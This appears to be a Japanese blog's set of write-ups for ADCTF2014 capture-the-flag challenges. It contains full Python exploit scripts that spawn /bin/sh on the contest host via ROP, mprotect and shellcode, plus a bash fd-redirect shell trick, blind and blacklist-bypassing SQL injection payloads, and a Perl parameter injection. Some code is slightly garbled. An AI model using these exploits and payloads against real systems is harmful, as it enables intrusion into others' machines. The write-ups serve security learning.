ADCTF2014 [20] easypwn
easy?どこがだよwww
Pwn me! The flag is in/home/easypwn/flag
. ASLR enabled, no libs. easypwnnc pwnable.katsudon.org 28099
pwn系で一番悩みましたw
だって使える要素があまりにも少ないんだもの
まあ今回もASLRは気にしない方針でいきましょ
今回はsyscallなんていう関数があるため、eaxに適切な値を格納して引数をスタックに積めばおk!
08048080 <syscall>: 8048080: 8b 54 24 0c mov 0xc(%esp),%edx 8048084: 8b 4c 24 08 mov 0x8(%esp),%ecx 8048088: 8b 5c 24 04 mov 0x4(%esp),%ebx 804808c: cd 80 int $0x80 804808e: c3 ret
今回書いたexploitはこちら
#!/usr/bin/env python from struct import * import sys import socket rhp = ("pwnable.katsudon.org",28099) sh = "/bin/sh" addr_syscall = 0x08048080 addr_read = 0x080480a9 addr_exit = 0x080480df elf_head = 0x08048000 sys_execve = 0x0b sys_mprotect = 0x7d length = 0x1000 null = 0x0 #========== nc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) nc.settimeout(0.5) nc.connect(rhp) exploit_st1 = "\x00"*0x10 exploit_st1 += pack("<I", addr_syscall) exploit_st1 += pack("<I", addr_read-0x2) exploit_st1 += pack("<I", elf_head) exploit_st1 += pack("<I", length) exploit_st1 += pack("<I", 0x7) exploit_st1 += "\x00"*(sys_mprotect-len(exploit_st1)) exploit_st2 = "\x00"*0x10 exploit_st2 += pack("<I", addr_syscall) #$ecx=elf_head exploit_st2 += pack("<I", addr_read) exploit_st2 += pack("<I", null) exploit_st2 += pack("<I", elf_head) exploit_st2 += pack("<I", null) exploit_st2 += pack("<I", null) exploit_st2 += pack("<I", addr_syscall) exploit_st2 += pack("<I", addr_exit) exploit_st2 += pack("<I", elf_head) exploit_st2 += pack("<I", null) exploit_st2 += pack("<I", null) nc.sendall(exploit_st1) nc.sendall(exploit_st2) nc.sendall(sh+"\x00"*(sys_execve-len(sh))) 続く
当初の予定ではexploit_st1は要らなかったんですよ
'/bin/sh'をスタック以外の固定された適当なアドレスに配置できれば、そこを参照して終了ですのでね。
そうは問屋が卸さない
方針変更:mmapを使おう
old_mmapしか文献が見当たらない。
構造体が配置できるなら最初っから解決してる
mmap2の存在は知ってても使い方が分からない ⇒ $eax=0xc0だと後に知る
方針変更:mprotectを使おう
$eax=0x7d
$ebx=address
$ecx=length
$edx=permission
これならいける
まずはmprotectするためにexploit_st1を送ります
exploit_st1 = "\x00"*0x10 exploit_st1 += pack("<I", addr_syscall) ※ exploit_st1 += pack("<I", addr_read-0x2) exploit_st1 += pack("<I", elf_head) exploit_st1 += pack("<I", length) exploit_st1 += pack("<I", 0x7) exploit_st1 += "\x00"*(sys_mprotect-len(exploit_st1))
pwn_me関数のリターン先は、※のsyscall関数になります
次のリターン先にはaddr_read-0x2(read前にmov %esp,%ecx を追加)を指定しておきます。
このexploit_st1の長さが、mprotectのシステムコール番号である0x7dになるように調整します。
そうすることでread後に$eaxに読み込んだ長さの0x7dが格納され、mprotectが使えます。
mprotectに与えるアドレスはページ境界でなければならないので、elfのヘッダが読み込まれてる先頭のアドレスを指定します。
これでいけたかな
08048000-08049000 rwxp 00000000 08:01 947049
なんか面白い
はい、では次です
exploit_st2 = "\x00"*0x10 exploit_st2 += pack("<I", addr_syscall) #$ecx=elf_head exploit_st2 += pack("<I", addr_read) exploit_st2 += pack("<I", null) exploit_st2 += pack("<I", elf_head) exploit_st2 += pack("<I", null) exploit_st2 += pack("<I", null) exploit_st2 += pack("<I", addr_syscall) exploit_st2 += pack("<I", addr_exit) exploit_st2 += pack("<I", elf_head) exploit_st2 += pack("<I", null) exploit_st2 += pack("<I", null)
最初のsyscallは$ecxにelf_headを格納するためだけに使っています。
なんだかもっとスマートにできる気がががg
そののちreadで"/bin/sh"+"\x00"*(sys_execve-len(sh))をelfのヘッダ部に読み込んで、$eaxにはexecveの0x0bが格納されます。
2回目のsyscallでexecveが呼ばれてbashが起動します。
リターン先を_startのexitに飛ばして終了です。 exploit_easypwn.py
FLAG: ADCTF_175_345y_7o_cON7ROL_5Y5c4LL
ADCTF2014 [17] oh my scanf
遂に来ましたPwnable!
This is my first program. oh_my_scanf.c oh_my_scanfnc pwnable.katsudon.org 32100
今回は典型的なスタックオーバーフローの問題ですね。
ASLRが有効らしいけど、俺はそんなの気にしない(的なこと言えたらかっこいいw)
まずプロセスマップを除いてみると、
0804a000-0804b000 rwxp 00001000 08:01 945933
うん、確実にここにシェルコード書き込めって言ってるよね、これ
そんなわけで、Exploit
from struct import * import sys import socket rhp = ("pwnable.katsudon.org",32100) sh = "/bin/sh\x00" offset_name = 0x00020060 offset_retn = 0x0002007c addr_format = 0x080485c7 addr_scanf = 0x08048506 addr_buffer = 0x0804a100 #========== nc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) nc.settimeout(1.0) nc.connect(rhp) exploit = "\x00"*(offset_retn-offset_name-4) exploit += pack("<I", addr_buffer) #$ebp=addr_buffer exploit += pack("<I", addr_scanf) exploit += pack("<I", addr_format) exploit += pack("<I", addr_buffer) nc.sendall(exploit+"\x0a") nc.recv(1024) payload = pack("<I", 0xdeadbeef) payload += pack("<I", addr_buffer+0x10) #exec_addr payload += sh payload += "\x00"*(0x10-len(payload)) payload += "\x31\xc0" #xor %eax,%eax payload += "\x04\x0f" #add 0x0f,%al payload += "\x34\x04" #xor 0x04,%eal payload += "\x89\xe3" #mov %esp,%ebx payload += "\x31\xc9" #xor %ecx,%ecx payload += "\x31\xd2" #xor %edx,%edx payload += "\xcd\x80" #int 0x80 nc.sendall(payload+"\x0a") nc.recv(1024) 続く
説明しますね
exploit = "\x00"*(offset_retn-offset_name-4) exploit += pack("<I", addr_buffer) #$ebp=addr_buffer exploit += pack("<I", addr_scanf) ※ exploit += pack("<I", addr_format) exploit += pack("<I", addr_buffer)
※のついているところがmain関数のret命令時にリターンする先です。
その前のアドレスは、leave命令でebpに格納する値です。
scanfで次のpayloadを読み込んで、実行可能な0x0804a100以降にシェルコードを書きこみます。
payload = pack("<I", 0xdeadbeef) payload += pack("<I", addr_buffer+0x10) #exec_addr payload += sh payload += "\x00"*(0x10-len(payload)) payload += "\x31\xc0" #xor %eax,%eax payload += "\x04\x0f" #add 0x0f,%al payload += "\x34\x04" #xor 0x04,%eal payload += "\x89\xe3" #mov %esp,%ebx payload += "\x31\xc9" #xor %ecx,%ecx payload += "\x31\xd2" #xor %edx,%edx payload += "\xcd\x80" #int 0x80
先頭の0xdeadbeefは、次のleave命令で格納する適当な値です
その先に、シェルコードが落ちているアドレスを格納しておきます。
その直後に’/bin/sh’の文字列がありますが、これにはちゃんと意味があります。
ret命令でシェルコードに制御が飛び、espは4だけ加算されて'/bin/sh'の先頭を指します。
そこでmov %esp,%ebxにより、ちょうどexecveの際のアドレスが指定できるという寸法です
あとのシェル表示はお遊びです。
本当にASLR関係なかったww
FLAG: ADCTF_Sc4NF_IS_PRe77Y_niCE
ADCTF2014 [16] blind shell
Restriction: You can't use any commands. (actually/bin/bash
only) Do not brute force. You don't need to. blind_shellnc pwnable.katsudon.org 44010
今日のは多分シェル芸だろうな
まずはgdbで解析
(gdb) x/128gx 0x400a88 0x400a88: 0x00000000004009c0 0x0000000000400990 0x400a98: 0x0000000000400990 0x00000000004009c9 0x400aa8: 0x00000000004009c9 0x0000000000400990 0x400ab8: 0x00000000004009c9 0x0000000000400990 0x400ac8: 0x0000000000400990 0x0000000000400990 0x400ad8: 0x00000000004009c9 0x0000000000400990 0x400ae8: 0x0000000000400990 0x0000000000400990 0x400af8: 0x0000000000400990 0x0000000000400990 0x400b08: 0x00000000004009c9 0x00000000004009c9 0x400b18: 0x00000000004009c9 0x00000000004009c9 0x400b28: 0x00000000004009c9 0x00000000004009c9 0x400b38: 0x00000000004009c9 0x00000000004009c9 0x400b48: 0x00000000004009c9 0x00000000004009c9 0x400b58: 0x00000000004009c9 0x00000000004009c9 0x400b68: 0x00000000004009c9 0x00000000004009c9 0x400b78: 0x00000000004009c9 0x0000000000400990 0x400b88: 0x00000000004009c9 0x00000000004009c9 0x400b98: 0x00000000004009c9 0x00000000004009c9 0x400ba8: 0x00000000004009c9 0x00000000004009c9 0x400bb8: 0x00000000004009c9 0x00000000004009c9 0x400bc8: 0x00000000004009c9 0x00000000004009c9 0x400bd8: 0x00000000004009c9 0x00000000004009c9 0x400be8: 0x00000000004009c9 0x00000000004009c9 0x400bf8: 0x00000000004009c9 0x00000000004009c9 0x400c08: 0x00000000004009c9 0x00000000004009c9 0x400c18: 0x00000000004009c9 0x00000000004009c9 0x400c28: 0x00000000004009c9 0x00000000004009c9 0x400c38: 0x00000000004009c9 0x00000000004009c9 0x400c48: 0x00000000004009c9 0x00000000004009c9 0x400c58: 0x00000000004009c9 0x0000000000400990 0x400c68: 0x0000000000400990 0x0000000000400990 0x400c78: 0x0000000000400990 0x00000000004009c9 0x400c88: 0x0000000000400990 0x00000000004009c9 0x400c98: 0x00000000004009c9 0x00000000004009c9 0x400ca8: 0x00000000004009c9 0x00000000004009c9 0x400cb8: 0x00000000004009c9 0x00000000004009c9 0x400cc8: 0x00000000004009c9 0x00000000004009c9 0x400cd8: 0x00000000004009c9 0x00000000004009c9 0x400ce8: 0x00000000004009c9 0x00000000004009c9 0x400cf8: 0x00000000004009c9 0x00000000004009c9 0x400d08: 0x00000000004009c9 0x00000000004009c9 0x400d18: 0x00000000004009c9 0x00000000004009c9 0x400d28: 0x00000000004009c9 0x00000000004009c9 0x400d38: 0x00000000004009c9 0x00000000004009c9 0x400d48: 0x00000000004009c9 0x00000000004009c9 0x400d58: 0x00000000004009c9 0x00000000004009c9 0x400d68: 0x00000000004009c9 0x00000000004009c9 0x400d78: 0x0000000000400990
ASCII文字の使用の不可の判断にjmp先のアドレスを指定して使われてるようですね
0x004009c9にjmpならセーフ、0x004009c0は回数限定、0x00400990は即終了
従って、英数字は全て大丈夫として、記号が以下の通りに分類されます。
使用可:#$&*:;<=>@_{|}
一回のみ使用可:SP
使用不可:!"%'()+,-./?[]^_`DEL
さて、これらで何をしようかな
bashの組み込みコマンドは使えるようなので、それらを駆使しようと思います。
まずはこれらを投げます
exec<&4>&4;read cmd;${cmd} /bin/bash
プログラムのソケットのfdは4でしたので入出力を繋げて、環境変数cmdにreadで『/bin/bash』を読み込ませます。
for path in ./*; do echo ${path}; done
ディレクトリ内のファイル一覧を表示させ
cd flag_is_in_dir
ディレクトリを移動後、再びファイル一覧表示
while read line; do echo ${line}; done < this_is_flag
フラグを取得
FLAG: ADCTF_y0u_C4N_533_y0U_c4N_br34tH
ADCTF2014 [14] secret table
またしてもSQLinjectionだ
楽しみだw
Yes, you can do sqli. Find our secret table and get the flag. Sorry, I'm missing source code. secrettable.adctf2014.katsudon.org
またしてもUser-Agentでインジェクションをするらしいな
しかし、今度は表示に変化がない・・・とおもいきや、文法エラーを起こすとServer error
うん、これError Based Blind SQL injectionだな
ここまでわかったものの、どうやってエラーを引き起こそう
どうやらCASE文が使えるらしいぞ
'+(case when (select substr('hoge',1,1)) > 'a' then 1 end)+'
成立すれば200が返ってくるし、ダメなら500だ
そんな感じでやってると、今度はこれはSQLiteということが判明
コードを書きなおしてこれでいこう
そんで、これが得られました
CREATE TABLE super_secret_flag__Ds7KLcV9 yo_yo_you_are_enjoying_blind_sqli TEXT
よし、もっかい
やったね
FLAG: ADCTF_ERR0r_hELP5_8L1nd_5Ql1
ADCTF2014 [13] loginpage
ログインページだー
You can't guess LOGINPAGE_SECRET absolutely, it's not answer. So, maybe there are some vulnerability and you got an admin and flag. I wrote this web app on Oct. 28 2014. Perl is awesome language and I love it :) loginpage.adctf2014.katsudon.org source
あれ、この問題どっかで見たことあるよ
あ、ちょっと違うけどこれだ
へぇー
同名パラメタでparamメソッドに渡すと配列を受け取れるのね
しかも、ハッシュ生成時に配列を含むと、インジェクションできるとか
脆弱性はloginpage.plの75行目から80行目にあり!
[perl] $self->session->{user} = { name => $self->param('name'), pass => $self->param('pass'), give_me_flag => 0, admin => $is_admin, }; [/perl]
じゃあPOSTでこうしましょ name=ShiftCrops&pass=abcd&pass=admin&pass=1&pass=give_me_flag
[perl] $self->session->{user} = { 'name' =>'ShiftCrops', 'pass' => 'abcd', 'admin' => 1, 'give_me_flag' => 'give_me_flag', '0' => 'admin', $is_admin => , }; [/perl]
FLAG:ADCTF_L0v3ry_p3rl_c0N73x7
ADCTF2014 [11] blacklist
SQL injectionキター
We have stupid blacklist. The flag is in flag
table.
blacklist.adctf2014.katsudon.org
source
さてさて、どこに脆弱性があるのかなー?
blacklist.plを読むと、20行目で接続元のUser-AgentとIPをそのままInsertしていますね。
IPは変えられなくても、User-Agentは任意の文字列に変えられるので、これで攻撃しようと思います。
しかし、ここで一つ問題が
仮に『','hoge')#』なんていう文字列を送ったとしても、'hoge'はipに格納されてしまうためこれじゃあ見られないなぁ
あ、valuesに対して二つの (ry そうだった『),(』使えないんだ
う~ん、、、
あれ、数値ってもしかして
『'+conv(hex*1,16,10)+'』と送ると、『1752131429』という値が返ってきました。
『hoge』⇒『68 6F 67 65』⇒『1752131429』
これでイケるぜ!!
ただ、数値の上限があるから5文字ずつ取り出しますかね
INFORMATION_SCHEMA.TABLESからテーブル名flag
INFORMATION_SCHEMA.COLUMNSからカラム名flag is here!!!
が分かります
あとはselect flag is here!!!
from flagするだけー
FLAG: ADCTF_d0_NoT_Us3_FUcK1N_8l4ckL1sT
ADCTF2014 [10] xor
xor+shiftの暗号かぁー
712249146f241d31651a504a1a7372384d173f7f790c2b115f47
Source Code:
[c]
#include <stdio.h>
#include <string.h>
int main() {
char flag = "ADCTF_XXXXXXXXXXXXXXXXXXXX";
int len = strlen(flag);
for (int i = 0; i < len; i++) {
if (i > 0) flag[i] ^= flag[i-1];
flag[i] ^= flag[i] >> 4;
flag[i] ^= flag[i] >> 3;
flag[i] ^= flag[i] >> 2;
flag[i] ^= flag[i] >> 1;
printf("%02x", (unsigned char)flag[i]);
}
return 0;
}
[/c]
昔、某k○nctfの暗号問題を解くときに書いたプログラムをそのまま流用するか
[c]
include <stdio.h>
include <string.h>
unsigned long decXORShift_R(unsigned long,int);
int main(void){ int i; char flag = {0x71,0x22,0x49,0x14,0x6f,0x24,0x1d,0x31,0x65,0x1a,0x50,0x4a,0x1a,0x73,0x72,0x38,0x4d,0x17,0x3f,0x7f,0x79,0x0c,0x2b,0x11,0x5f,0x47,0x00}; int len = strlen(flag);
for(i=len-1; i>=0; i--){ flag[i]=decXORShift_R(flag[i],1); flag[i]=decXORShift_R(flag[i],2); flag[i]=decXORShift_R(flag[i],3); flag[i]=decXORShift_R(flag[i],4); if(i>0) flag[i] ^= flag[i-1]; } printf("%s",flag);
return 0; }
unsigned long decXORShift_R(unsigned long x,int t){ unsigned long y=x, z=0; for(unsigned long mask=((1U<<t)-1)<<(sizeof(long)*8-t);mask;mask>>=t){ z |= (y&mask)>>t; y = zx; } return y; }
[/c]
元のプログラムはand演算を加味したものも解けるようにしてあったのだけど、今回は必要ないから取り除きました
FLAG: ADCTF_51mpl3_X0R_R3v3r51n6